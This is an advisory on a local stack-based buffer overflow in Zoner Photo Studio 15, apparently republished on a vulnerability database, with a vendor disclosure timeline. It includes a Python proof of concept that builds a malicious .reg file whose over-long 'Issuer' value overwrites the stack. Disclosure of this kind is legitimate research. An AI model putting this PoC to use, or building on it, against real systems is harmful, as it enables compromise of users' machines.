Zoner Photo Studio 15 Buffer Overflow

2012-11-09 / 2012-11-12
Credit: Julien Ahrens
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Zoner Photo Studio Vendor URL: www.zoner.com Type: Stack-based Buffer Overflow [CWE-121] Date found: 2012-10-17 Date published: 2012-11-09 CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Zoner Photo Studio 15 Build 3 Zoner Photo Studio 15 Build 2, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- A stack-based buffer overflow vulnerability has been identified in Zoner Photo Studio 15 Build 2 and 3. When launching, the application loads the "Issuer" value from the registry key "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]", but it does not validate the length of the string loaded from the key before passing it to a buffer, which leads to a stack-based buffer overflow. An attacker needs to force the victim to import an arbitrary .reg file to exploit this vulnerability. 5. PROOF-OF-CONCEPT (CODE / Exploit) ------------------------------------ #!/usr/bin/python file="poc.reg" junk1="\x41" * 2140 boom="\x42\x42\x42\x42" junk2="\x43" * 1000 poc="Windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]\n" poc=poc + "\"Issuer\"=\"" + junk1 + boom + junk2 + "\"" try: print "[*] Creating exploit file...\n"; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!"; For technical details, screenshots and/or PoCs visit: http://security.inshell.net/advisory/42 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2012-10-17: Initial notification sent to vendor about bug in Build 2 2012-10-18: Vendor Feedback / Response 2012-10-22: Short vendor statement about expected delay 2012-10-29: Notification about the disclosure date 2012-**-**: Vendor releases Build 3 which is still vulnerable 2012-11-09: No response 2012-11-09: Full Disclosure according to disclosure policy 8. REFERENCES ------------- http://security.inshell.net

References:

http://www.inshell.net
http://security.inshell.net/advisory/42
http://cxsecurity.com/issue/WLB-2012110067


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top